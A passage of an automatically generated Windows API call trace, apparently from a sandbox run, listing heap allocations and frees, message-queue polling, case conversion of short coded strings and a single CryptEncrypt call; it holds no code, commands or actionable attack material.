hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.743] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.744] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.744] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.744] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.745] CharLowerBuffW (in: lpsz="byte[72872]", cchLength=0xb | out: lpsz="byte[72872]") returned 0xb [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0265.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0265.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0265.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0265.749] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.749] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.749] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.749] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.749] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0265.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0265.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0265.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.750] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x11ca6, dwBufLen=0x11ca8 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x11ca8) returned 1 [0265.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0265.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0265.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.752] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0265.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0265.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0265.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.754] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.754] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.755] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.755] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.755] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.755] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.755] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.756] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.757] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.757] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.757] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.757] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.757] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.757] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.758] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.758] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.758] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.758] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.758] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.770] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.771] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.771] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0265.771] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.771] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0265.772] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.772] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.772] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.772] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.772] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.772] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.772] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 